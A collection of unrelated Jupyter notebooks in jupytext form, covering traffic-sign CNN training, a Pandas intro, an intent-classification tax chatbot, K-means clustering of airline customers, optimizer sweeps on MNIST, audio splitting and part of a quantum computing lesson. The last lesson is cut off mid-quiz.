# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- import imageio from io import BytesIO import numpy as np from matplotlib import pyplot as plt with open('data/test.mkv', 'rb') as file: content = file.read() vid = imageio.get_reader(BytesIO(content), 'ffmpeg') images = [] for num, image in enumerate(vid.iter_data()): if num % 1000: images.append(image) print(len(images)) plt.imshow(images[1150])
src/main/tests/data_acquisition/.ipynb_checkpoints/data_acquisition-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import os import glob import numpy as np import matplotlib.pyplot as plt from skimage import color, exposure, transform, io from sklearn.cross_validation import train_test_split from keras import utils as np_utils from keras.models import Sequential from keras.layers.core import Dense, Dropout, Activation, Flatten from keras.layers.convolutional import Conv2D from keras.layers.pooling import MaxPooling2D from keras.optimizers import SGD from keras import backend as K from keras.callbacks import LearningRateScheduler, ModelCheckpoint K.set_image_data_format('channels_first') # Define the number of outputs to train and image size NUM_CLASSES = 43 # 43 for GTSRB and 164 for European dataset IMG_SIZE = 48 # + import keras import tensorflow as tf import sys print('Keras version', keras.__version__) print('Tensorflow version', tf.__version__) print('Python version', sys.version) # - # ## Function definitions for reading the data # + def preprocess_img(img): # Histogram normalization in v channel hsv = color.rgb2hsv(img) hsv[:, :, 2] = exposure.equalize_hist(hsv[:, :, 2]) img = color.hsv2rgb(hsv) # rescale to standard size img = transform.resize(img, (IMG_SIZE, IMG_SIZE)) # roll color axis to axis 0 img = np.rollaxis(img, -1) return img def get_class(img_path): return int(img_path.split('/')[-2]) # - # ## Read the data # + # Read the training data # Define the path to your traning dataset (GTSRB - Training) root_dir = '../../Datasets/Traffic_signs/German_Recognition/Final_Training/Images' imgs = [] labels = [] # Read all image paths with extension ppm all_img_paths = sorted(glob.glob(os.path.join(root_dir, '*/*.ppm'))) np.random.seed(42) np.random.shuffle(all_img_paths) # Read images and pre-process them for img_path in all_img_paths: img = preprocess_img(io.imread(img_path)) label = get_class(img_path) imgs.append(img) labels.append(label) X = np.array(imgs, dtype='float32') # Binarize the labels Y = np.eye(NUM_CLASSES, dtype='uint8')[labels] # + # Read the testing data # Define the path to your testing dataset (GTSRB - Test) root_dir = '../../Datasets/Traffic_signs/German_Recognition/Final_Test/Images' # images are in folders like in training set X_test = [] y_test = [] paths_test=[] # Read all image paths with extension ppm all_img_paths = sorted(glob.glob(os.path.join(root_dir, '*/*.ppm'))) np.random.seed(42) np.random.shuffle(all_img_paths) # Read images and pre-process them for img_path in all_img_paths: img = preprocess_img(io.imread(img_path)) paths_test.append(img_path) label = get_class(img_path) X_test.append(img) y_test.append(label) X_test = np.array(X_test, dtype='float32') # Binarize the labels y_test = np.eye(NUM_CLASSES, dtype='uint8')[y_test] # - # Split training data into train and validation sets # random_state helps defining the same split always with a seed of 42. Otherwise the split will always be different X_train, X_val, Y_train, Y_val = train_test_split(X, Y, test_size=0.1, random_state=42) # + # Normalize the data normalize = 0 # Subtract the mean image if normalize: mean_image = np.mean(X_train, axis=0) X_train -= mean_image X_val -= mean_image X_test -= mean_image # - print ('Training data shape: ', X.shape) print ('Training labels shape:', Y.shape) print ('Validation data shape: ', X_val.shape) print ('Validation labels shape: ', Y_val.shape) print ('Testing data sahep: ', X_test.shape) print ('Testing labels shape: ', y_test.shape) # ## Model definition def cnn_model(): model = Sequential() model.add(Conv2D(32, (3, 3), padding='same', input_shape=(3, IMG_SIZE, IMG_SIZE), activation='relu')) model.add(Conv2D(32, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Conv2D(64, (3, 3), padding='same', activation='relu')) model.add(Conv2D(64, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Conv2D(128, (3, 3), padding='same', activation='relu')) model.add(Conv2D(128, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Flatten()) model.add(Dense(512, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(NUM_CLASSES, activation='softmax')) return model # ## Initialize the model and training parameters # + model = cnn_model() batch_size = 128 epochs = 40 lr = 0.01 sgd = SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True) def lr_schedule(epoch): return lr * (0.1 ** int(epoch / 10)) model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) # weights initialization def my_init(shape, name=None): value = np.random.random(shape) return K.variable(value, name=name) # - # ## Start the training # Save the training history history = model.fit(X_train, Y_train, batch_size=batch_size, epochs=epochs, validation_data=(X_val,Y_val), callbacks=[LearningRateScheduler(lr_schedule), ModelCheckpoint('german_cnn.h5', save_best_only=True)] ) # + # Plot the learning curves acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, '-o', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend(loc=4) plt.figure() plt.plot(epochs, loss, '-o', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # - # ## Model evlauation # evaluate loaded model on test data score = model.evaluate(X_test, y_test, batch_size=128, verbose=1) print("[INFO] %s: %.2f%%" % (model.metrics_names[1], score[1]*100)) # + # load weights into new model (best weights) model2 = cnn_model() model2.load_weights('GTSRB_weights/cnn_german.h5') print("Loaded weights from disk") # evaluate loaded model on test data model2.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) score = model2.evaluate(X_test, y_test, batch_size=128, verbose=1) print("[INFO] %s: %.2f%%" % (model2.metrics_names[1], score[1]*100)) # - # # Data augmentation # + from keras.preprocessing.image import ImageDataGenerator from sklearn.cross_validation import train_test_split from keras.callbacks import LearningRateScheduler, ModelCheckpoint datagen = ImageDataGenerator(featurewise_center=False, featurewise_std_normalization=False, width_shift_range=0.1, height_shift_range=0.1, zoom_range=0.2, shear_range=0.1, rotation_range=10.) datagen.fit(X_train) # Reinitialize model and compile #model = cnn_model() #model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) # Train again epochs = 40 history2=model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size), steps_per_epoch=X_train.shape[0]/batch_size, epochs=epochs, validation_data=(X_val, Y_val), callbacks=[LearningRateScheduler(lr_schedule), ModelCheckpoint('cnn_german_aug.h5', save_best_only=True)] ) # + # Plot the learning curves acc = history2.history['acc'] val_acc = history2.history['val_acc'] loss = history2.history['loss'] val_loss = history2.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, '-o', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend(loc=4) plt.figure() plt.plot(epochs, loss, '-o', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # - # evaluate loaded model on test data score = model.evaluate(X_test, y_test, batch_size=128, verbose=1) print("%s: %.2f%%" % (model.metrics_names[1], score[1]*100)) # + # load weights into new model (best weights) model2 = cnn_model() model2.load_weights('GTSRB_weights/cnn_german_aug.h5') #model2.load_weights('model_aug3_98.94.h5') print("Loaded model from disk") # evaluate loaded model on test data lr = 0.01 sgd = SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True) model2.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) score = model2.evaluate(X_test, y_test, batch_size=128, verbose=1) print("%s: %.2f%%" % (model2.metrics_names[1], score[1]*100)) # - # Print model information model.summary()
models/cnn_8-layers/cnn_model.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:pydata-issst] # language: python # name: conda-env-pydata-issst-py # --- # # A very brief introduction to Pandas # This notebook will cover a few quick examples to show what Pandas dataframes are and how we can use them to work with data. Pandas is an indispensable library for working with data. It easily imports/exports data from a wide variety of sources (Excel, csv, SQL, JSON, HTML, etc), provides nice row/column indexing for viewing/selecting/manipulating the data, works well with time series data, and can do just about any sort of data processing faster than a function you could write yourself. # # For more resources check out: # - [The official 10-min intro to Pandas](https://pandas.pydata.org/pandas-docs/stable/10min.html) # - A nice [DataCamp tutorial on Pandas](https://www.datacamp.com/community/tutorials/pandas-tutorial-dataframe-python) # - The absolutely terrific [Modern Pandas](https://tomaugspurger.github.io/modern-1-intro.html) # By convention we import Pandas as `pd` import pandas as pd # ## Make a simple dataframe # We can create a DataFrame with a dictionary of list or array-like objects. Each item in the dictionary becomes a column, and all items must have the same length. data = { 'label': [x for x in 'ABCABC'], 'data': range(6) } data # ## Select portions of the data # Select a single column, which is a Pandas Series, using brackets, `.<name>`, or `.loc[]`. Always use `.loc[]` when assigning a portion of the data from a DataFrame to another object. # ### Slice the DataFrame # ## Perform string operations on a column # ## Perform math operations # ## Find unique values # ## Group data # Groupby splits a single dataframe into a group of dataframes based on the unique values in one or more columns. You can then specify an operation to apply to each group. Pandas will apply the operation, recombine the data, and return the result. # # Because `groupby` splits the data with very little code it can also be an efficient way to access filtered portions of a large dataframe. # ## apply and map # ## Why you should use `.loc[]` # # See the [Setting with copy section](https://tomaugspurger.github.io/modern-1-intro.html) for a more detailed explanation.
notebooks/Pandas/1_class - Intro to Pandas.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Chatbot - example # Example from Chatbot Magazine - https://chatbotsmagazine.com/contextual-chat-bots-with-tensorflow-4391749d0077 import nltk from nltk.stem.lancaster import LancasterStemmer stemmer = LancasterStemmer() import pandas as pd import numpy as np import tflearn import tensorflow as tf import random # ## Step 1: Create a json file for intents (intents.json) # - tags are the name of the intent # - patterns are the questions for the intent so there is a sentence patterns for the NN classifier of which intents # - resposnes are the answers to the question in that intent # + # Import intents file import json with open('intents.json') as json_data: intents = json.load(json_data) # - # ## Step 2: Preprocess data - words, intents classes and documents # + # to use nltk work_tokenize # nltk.download('punkt') # + words = [] classes = [] documents = [] ignore_words = ['?'] # loop through each sentence in our intents patterns for intent in intents['intents']: for pattern in intent['patterns']: # tokenize each word in the sentence w = nltk.word_tokenize(pattern) # add to our words list words.extend(w) # add to documents in our corpus documents.append((w, intent['tag'])) # add to our classes list if intent['tag'] not in classes: classes.append(intent['tag']) # stem and lower each word and remove duplicates words = [stemmer.stem(w.lower()) for w in words if w not in ignore_words] words = sorted(list(set(words))) # remove duplicates classes = sorted(list(set(classes))) print (len(documents), "documents") print (len(classes), "classes", classes) print (len(words), "unique stemmed words", words) # - # ## Step 3: Train with BOW # ### 3a) Tranformation for TensorFlow: from documents of words into tensors of numbers # + # create our training data training = [] output = [] # create an empty array for our output output_empty = [0] * len(classes) # training set, bag of words for each sentence for doc in documents: # initialize our bag of words bag = [] # list of tokenized words for the pattern pattern_words = doc[0] # stem each word pattern_words = [stemmer.stem(word.lower()) for word in pattern_words] # create our bag of words array for w in words: bag.append(1) if w in pattern_words else bag.append(0) # output is a '0' for each tag and '1' for current tag output_row = list(output_empty) output_row[classes.index(doc[1])] = 1 training.append([bag, output_row]) # shuffle our features and turn into np.array random.shuffle(training) training = np.array(training) # create train and test lists train_x = list(training[:,0]) # first column = BOW rep train_y = list(training[:,1]) # second column = intent class rep # - # ### 3b) Build model # + # reset underlying graph data tf.reset_default_graph() # Build neural network net = tflearn.input_data(shape=[None, len(train_x[0])]) net = tflearn.fully_connected(net, 8) net = tflearn.fully_connected(net, 8) net = tflearn.fully_connected(net, len(train_y[0]), activation='softmax') net = tflearn.regression(net) # Define model and setup tensorboard model = tflearn.DNN(net, tensorboard_dir='tflearn_logs') # Start training (apply gradient descent algorithm) model.fit(train_x, train_y, n_epoch=1000, batch_size=8, show_metric=True) model.save('model.tflearn') # + # save all of our data structures import pickle pickle.dump( {'words':words, 'classes':classes, 'train_x':train_x, 'train_y':train_y}, open( "training_data", "wb" ) ) # - # ## Step 4: Build Chatbot Framework # + # restore all of our data structures import pickle data = pickle.load( open( "training_data", "rb" ) ) words = data['words'] classes = data['classes'] train_x = data['train_x'] train_y = data['train_y'] # import our chat-bot intents file import json with open('intents.json') as json_data: intents = json.load(json_data) # - # load our saved model model.load('./model.tflearn') # + # Functions for tokenizing and BOW vector rep of the query def clean_up_sentence(sentence): # tokenize the pattern sentence_words = nltk.word_tokenize(sentence) # stem each word sentence_words = [stemmer.stem(word.lower()) for word in sentence_words] return sentence_words # return bag of words array: 0 or 1 for each word in the bag that exists in the sentence def bow(sentence, words, show_details=False): # tokenize the pattern sentence_words = clean_up_sentence(sentence) # bag of words bag = [0]*len(words) for s in sentence_words: for i,w in enumerate(words): if w == s: bag[i] = 1 if show_details: print ("found in bag: %s" % w) return(np.array(bag)) # - p = bow("what is the tax code for qualified contribution limits?", words) print (p) # + # Functions to classify intent and output responses based on the intent ERROR_THRESHOLD = 0.25 def classify(sentence): # generate probabilities from the model results = model.predict([bow(sentence, words)])[0] # filter out predictions below a threshold results = [[i,r] for i,r in enumerate(results) if r>ERROR_THRESHOLD] # sort by strength of probability results.sort(key=lambda x: x[1], reverse=True) return_list = [] for r in results: return_list.append((classes[r[0]], r[1])) # return tuple of intent and probability return return_list def response(sentence, userID='123', show_details=False): results = classify(sentence) # if we have a classification then find the matching intent tag if results: # loop as long as there are matches to process while results: for i in intents['intents']: # find a tag matching the first result if i['tag'] == results[0][0]: # a random response from the intent #return print(random.choice(i['responses'])) return random.choice(i['responses']) results.pop(0) # - # Example 1: classify('what is the tax code for qualified contribution limits?') # Example 1: response('what is the tax code for qualified contribution limits?') r = response('what is the tax code for qualified contribution limits?') # Example 2: classify('How does increased compensation from previous year taxed?') # Example 2: response('hello') # + # Import script to search the right tax code and description from tax corpus from taxcode_tfidf_search_script import * def full_response(sentence, top_n): answer = response(sentence) if answer == "Tax code is": temp = query_wrapper(sentence,cosine_sim_threshold=0.2,top=top_n) if len(temp) == 0: final = "No tax code found" else: temp_values = temp['title'].values final = (answer + " " + temp_values).tolist() elif answer == "Here is what we found in the tax code:": temp = query_wrapper(sentence,cosine_sim_threshold=0.2,top=top_n) if len(temp) == 0: final = "We have not found any section in tax code related to your question" else: temp_values = temp['title'].values + " " + temp['text'].values final = (answer + " " + temp_values).tolist() else: final = answer return final # - # Example: tax codes top 5 full_response("what is the tax code for qualified contribution limits?", 5) # Example: tax descriptions top 3 full_response("For a benefit plan to be considered as a qualified plan, what are the minimum plan participation criteria?",3)
Bin/Chatbot example_v2.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Project Submission # # When you are ready to submit your project, meaning you have checked the [rubric](https://review.udacity.com/#!/rubrics/1427/view) and made sure that you have completed all tasks and answered all questions. Then you are ready to compress your files and submit your solution! # # The following steps assume: # 1. All cells have been *run* in Notebooks 2 and 3 (and that progress has been saved). # 2. All questions in those notebooks have been answered. # 3. Your architecture in `model.py` is your best tested architecture. # # Please make sure all your work is saved before moving on. You do not need to change any code in these cells; this code is to help you submit your project, only. # # --- # # The first thing we'll do, is convert your notebooks into `.html` files; these files will save the output of each cell and any code/text that you have modified and saved in those notebooks. Note that the first notebooks are not included because their contents will not affect your project review. # !jupyter nbconvert "2_Training.ipynb" # !jupyter nbconvert "3_Inference.ipynb" # ### Zip the project files # # Next, we'll zip all these notebook files and your `model.py` file into one compressed archive named `project2.zip`. # # After completing this step you should see this zip file appear in your home directory, where you can download it as seen in the image below, by selecting it from the list and clicking **Download**. This step may take a minute or two to complete. # # <img src='images/download_ex.png' width=50% height=50%/> # !!apt-get -y update && apt-get install -y zip # !zip project2.zip -r . -i@file<EMAIL> # ### Submit Your Project # # After creating and downloading your zip file, click on the `Submit` button and follow the instructions for submitting your `project2.zip` file. Congratulations on completing this project and I hope you enjoyed it!
4_Zip Your Project Files and Submit.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # These lines allow to work more easily on our module while using the notebook # %load_ext autoreload # %reload_ext autoreload # %autoreload 2 import numpy as np from importlib import reload import model import agents from time import sleep # + #our very first wagon :) t = 20 spwan_coord=(6,3) mymodel = model.MODEL(7,15) mymodel.verbose = False mymodel.walls[(1,4)] = 1 mymodel.walls[(1,3)] = 1 mymodel.walls[(1,10)] = 1 mymodel.agents = [model.AGENT((6,3),mymodel,"A"),model.AGENT((6,2),mymodel,"B"),model.AGENT((6,11),mymodel,"C")] mymodel.restCells = [model.RESTCELL((1,5),5),model.RESTCELL((1,2),5),model.RESTCELL((1,9),5),model.RESTCELL((1,11),5)] mymodel.plot_Nb() for i in range (0,t): mymodel.newStep() if i<4 : mymodel.agents.append(agents.AGENT(spwan_coord, mymodel,str(i))) mymodel.clear() mymodel.plot_Nb() sleep(1) # + #second wagon wagon :) t = 30 agent_allowed_to_stand_up = "yes" spawn_coord=(5,2) spawn_coord2=(5,8) mymodel = model.MODEL(6,12) mymodel.verbose = False mymodel.walls[(1,5)] = 1 mymodel.walls[(2,5)] = 1 mymodel.walls[(4,5)] = 1 mymodel.agents = [model.AGENT((5,2),mymodel,"1"),model.AGENT((5,8),mymodel,"2")] mymodel.restCells = [model.RESTCELL((1,1),5),model.RESTCELL((2,1),5),model.RESTCELL((1,4),5),model.RESTCELL((2,4),5),model.RESTCELL((1,10),5),model.RESTCELL((2,10),5),model.RESTCELL((4,4),5),model.RESTCELL((4,6),5),model.RESTCELL((1,6),5),model.RESTCELL((2,6),5)] mymodel.plot_Nb() for i in range (0,t): mymodel.newStep() if i<2: mymodel.agents.append(agents.AGENT(spawn_coord, mymodel,str(i+3))) if i<6 : mymodel.agents.append(agents.AGENT(spawn_coord2, mymodel,str(i+5))) mymodel.clear() mymodel.plot_Nb() sleep(1) # -
Kiara_wagons.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:Anaconda3] # language: python # name: conda-env-Anaconda3-py # --- # + # -*- coding:utf-8 -*- import pandas as pd datafile = '../data/air_data.csv' resultfile = '../data/explore.xls' data = pd.read_csv(datafile, encoding='utf-8') data.head() # - explore = data.describe(percentiles=[], include='all').T explore['null'] = len(data) - explore['count'] explore = explore[['null', 'max', 'min']] explore.columns = [u'空值数',u'最大值',u'最小值'] explore.to_excel(resultfile) explore_data=pd.read_excel('../data/explore.xls') explore_data.describe() cleanfile = '../data/data_cleaned.csv' data = data[data['SUM_YR_1'].notnull()*data['SUM_YR_2'].notnull()] data.head() index1 = data.SUM_YR_1 != 0 index2 = data.SUM_YR_2 != 0 index3 = (data.SEG_KM_SUM == 0) & (data.avg_discount == 0) data = data[index1 | index2 | index3] data.to_csv('../data/data_cleaned.csv') non_normal_data = pd.read_excel('../data/zscoredata.xls') non_normal_data .head() normal_data = (non_normal_data - non_normal_data.mean(axis = 0)) / non_normal_data.std(axis=0) normal_data.head() normal_data.columns = ['Z'+i for i in normal_data.columns] normal_data.to_excel('../data/zscored-data.xls', index=False) normal_data.head() from sklearn.cluster import KMeans inputfile = '../data/zscored-data.xls' k =5 data = pd.read_excel(inputfile) kmodel = KMeans(n_clusters= k, n_jobs=4) kmodel.fit(data) kmodel.cluster_centers_ kmodel.labels_ # + # 绘制雷达图 import numpy as np import matplotlib.pyplot as plt # %matplotlib inline labels = data.columns k = 5 plot_data = kmodel.cluster_centers_ color = ['b', 'g', 'r', 'c', 'y'] angles = np.linspace(0, 2*np.pi, k, endpoint=False) plot_data = np.concatenate((plot_data, plot_data[:,[0]]), axis=1) angles = np.concatenate((angles, [angles[0]])) fig = plt.figure() ax = fig.add_subplot(111, polar=True) for i in range(len(plot_data)): ax.plot(angles, plot_data[i], 'o-', color = color[i], label = 'costomer'+str(i), linewidth=2) ax.set_rgrids(np.arange(0.01, 3.5, 0.5), np.arange(-1, 2.5, 0.5), fontproperties="SimHei") ax.set_thetagrids(angles * 180/np.pi, labels, fontproperties="SimHei") ax.set_title("客户群特征分析图", va='bottom', fontproperties="SimHei") plt.legend(loc = 0) plt.show() # -
customerValueAnalysis/code/customer_analysis.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import torch torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False # + import numpy as np import pickle from collections import namedtuple from tqdm import tqdm import torch torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torchvision import torchvision.transforms as transforms from adabound import AdaBound import matplotlib.pyplot as plt # + transform = transforms.Compose( [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) trainset = torchvision.datasets.MNIST(root='./data_mnist', train=True, download=True, transform=transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=200, shuffle=True, num_workers=4) testset = torchvision.datasets.MNIST(root='./data_mnist', train=False, download=True, transform=transform) testloader = torch.utils.data.DataLoader(testset, batch_size=200, shuffle=False, num_workers=4) # + device = 'cuda:0' optim_configs = { '1e-4': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 1e-4, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '5e-3': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 5e-3, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '1e-2': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 1e-2, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '1e-3': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 1e-3, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '5e-4': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 5e-4, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, } # + class MLP(nn.Module): def __init__(self, hidden_size=256): super(MLP, self).__init__() self.fc1 = nn.Linear(28 * 28, hidden_size) self.fc2 = nn.Linear(hidden_size, 10) def forward(self, x): x = x.view(-1, 28 * 28) x = F.relu(self.fc1(x)) x = self.fc2(x) return x criterion = nn.CrossEntropyLoss() # + hidden_sizes = [256, 512, 1024, 2048] for h_size in hidden_sizes: Stat = namedtuple('Stat', ['losses', 'accs']) train_results = {} test_results = {} for optim_name, optim_config in optim_configs.items(): torch.manual_seed(0) np.random.seed(0) train_results[optim_name] = Stat(losses=[], accs=[]) test_results[optim_name] = Stat(losses=[], accs=[]) net = MLP(hidden_size=h_size).to(device) optimizer = optim_config['optimizer'](net.parameters(), **optim_config['kwargs']) print(optimizer) for epoch in tqdm(range(100)): # loop over the dataset multiple times train_stat = { 'loss': .0, 'correct': 0, 'total': 0 } test_stat = { 'loss': .0, 'correct': 0, 'total': 0 } for i, data in enumerate(trainloader, 0): # get the inputs inputs, labels = data inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() _, predicted = torch.max(outputs, 1) c = (predicted == labels).sum() # calculate train_stat['loss'] += loss.item() train_stat['correct'] += c.item() train_stat['total'] += labels.size()[0] train_results[optim_name].losses.append(train_stat['loss'] / (i + 1)) train_results[optim_name].accs.append(train_stat['correct'] / train_stat['total']) with torch.no_grad(): for i, data in enumerate(testloader, 0): inputs, labels = data inputs = inputs.to(device) labels = labels.to(device) outputs = net(inputs) loss = criterion(outputs, labels) _, predicted = torch.max(outputs, 1) c = (predicted == labels).sum() test_stat['loss'] += loss.item() test_stat['correct'] += c.item() test_stat['total'] += labels.size()[0] test_results[optim_name].losses.append(test_stat['loss'] / (i + 1)) test_results[optim_name].accs.append(test_stat['correct'] / test_stat['total']) # Save stat! stat = { 'train': train_results, 'test': test_results } with open(f'amsgrad_stat_mlp_{h_size}.pkl', 'wb') as f: pickle.dump(stat, f) # Plot loss f, (ax1, ax2) = plt.subplots(1, 2, figsize=(13, 5)) for optim_name in optim_configs: if 'Bound' in optim_name: ax1.plot(train_results[optim_name].losses, '--', label=optim_name) else: ax1.plot(train_results[optim_name].losses, label=optim_name) ax1.set_ylabel('Training Loss') ax1.set_xlabel('# of Epcoh') ax1.legend() for optim_name in optim_configs: if 'Bound' in optim_name: ax2.plot(test_results[optim_name].losses, '--', label=optim_name) else: ax2.plot(test_results[optim_name].losses, label=optim_name) ax2.set_ylabel('Test Loss') ax2.set_xlabel('# of Epcoh') ax2.legend() plt.suptitle(f'Training Loss and Test Loss for MLP({h_size}) on MNIST', y=1.01) plt.tight_layout() plt.show() # Plot accuracy f, (ax1, ax2) = plt.subplots(1, 2, figsize=(13, 5)) for optim_name in optim_configs: if 'Bound' in optim_name: ax1.plot(train_results[optim_name].accs, '--', label=optim_name) else: ax1.plot(train_results[optim_name].accs, label=optim_name) ax1.set_ylabel('Training Accuracy %') ax1.set_xlabel('# of Epcoh') ax1.legend() for optim_name in optim_configs: if 'Bound' in optim_name: ax2.plot(test_results[optim_name].accs, '--', label=optim_name) else: ax2.plot(test_results[optim_name].accs, label=optim_name) ax2.set_ylabel('Test Accuracy %') ax2.set_xlabel('# of Epcoh') ax2.legend() plt.suptitle(f'Training Accuracy and Test Accuracy for MLP({h_size}) on MNIST', y=1.01) plt.tight_layout() plt.show() # -
Feedforward Learning Rate Search/AMSGrad.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + from glob import glob mp3s = list(set(glob('*.mp3'))) len(mp3s) # + # # !cp ../*.mp3 . # - # !rm -rf clean-wav # !mkdir clean-wav # !cp ../mp.py . from pydub import AudioSegment from tqdm import tqdm import os os.path.split(mp3s[0]) def loop(mp3s): mp3s = mp3s[0] for f in tqdm(mp3s): try: replace = f.replace(' ', '-').replace('--', '_').replace('.mp3', '') os.system(f'ffmpeg -ss {60 * 5} -i "{f}" -f segment -segment_time {60 * 10} -c copy "{replace}-part-%03d.mp3"') globed = glob(f'{replace}-part*') for g in globed: audio = AudioSegment.from_mp3(g) audio.set_frame_rate(16000).set_channels(1).export(f"clean-wav/{g.replace('.mp3','.wav')}", format = 'wav') except Exception as e: print(f, e) from mp import multiprocessing multiprocessing(mp3s, loop, cores = 5, returned = False) # !rm *-part-*.mp3
data/language/malay/split.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Why quantum computing? # ## What is a computer? # # Seeing as you’ve managed to access this webpage, you should already know what a computer is. Today, computers take many forms: From laptops and phones to the systems controlling traffic lights. It seems computers can do anything! These systems can be very complex and specialised, but they all have one thing in common: A computer carries out a set of instructions on some input information to give us some new (output) information. # # The instructions we give computers need to be very specific and unambiguous. We call these sets of instructions _algorithms,_ and a lot of the research into computers is into the behaviour of different algorithms. In this course, we will only consider computers in their simplest form; no keyboards, mice, or screens- just information and algorithms. # # ![An artists rendering of basically all computers](images/why-qc/basically_all_computers.png) # + [markdown] formulas={"T": {"meaning": "This is the average time our search algorithm takes to run.", "type": "Locally defined variable"}, "exp": {"meaning": "This is the number of digits in our secret number. Because this is a superscript, this means we are doing 10 to the power of d.", "type": "Locally defined variable"}, "prop_to": {"meaning": "'Proportional to': Everything to the left of this symbol is <a href='https://en.wikipedia.org/wiki/Proportionality_(mathematics)'>proportional to</a> the things on the right.", "type": "Universal notation"}} gloss={"resources": {"text": "A resource is anything the algorithm needs to run. In computer science, this usually means either the time needed by the algorithm, or the space (e.g. computer memory).", "title": "Resources"}} # ## Classifying computer algorithms # # To understand the role of quantum computers amongst modern traditional computers, we first need to learn how we measure the perfomance of different algorithms. # # In computer science, we classify algorithms on how the [resources](gloss:resources) they use grow with the size of the input. We call this the algorithm’s _complexity_. For example, an algorithm that decides if a number is even only needs to look at the last digit in that number. In this case, the ‘input’ is a number, and the output is either ‘Even’ or ‘Odd’. We call this a _constant time_ algorithm, because the time the algorithm takes to complete doesn't depend on the size of the input number. It might take different computers different amounts of time to get this result, but that’s due to other factors and not the length of the input. # # ![The steps of an algorithm that works out if a number is even or odd](images/why-qc/odd-even-algo.svg) # # Let’s look at a different example. This time, the input is two numbers of equal length, and the problem is to add them together. In this case the output will be a new number. When adding two multi-digit numbers, a common algorithm you probably learnt at school starts with the rightmost digit from each number and adds them together. It then moves one digit to the left (carrying over a ‘1’ if the result was greater than 9) and repeats the process. The computer repeats this until there are no more digits to add, and the algorithm ends. # # ![Animation showing the steps of an addition algorithm](images/why-qc/adding-algo.svg) # # <!-- ::: q-block.exercise --> # # ### How complex is addition? # # <!-- ::: q-quiz(goal="intro-why-qc-0") --> # # <!-- ::: .question --> # # The time this addition algorithm takes to complete... # # <!-- ::: --> # # <!-- ::: .option(correct) --> # # 1. ...grows linearly (proportionally) with the length of the input number (linear time). # # <!-- ::: --> # # <!-- ::: .option --> # # 2. ...is not affected by the length of the input number (constant time) # # <!-- ::: --> # # <!-- ::: .option --> # # 3. ...grows with the square of the 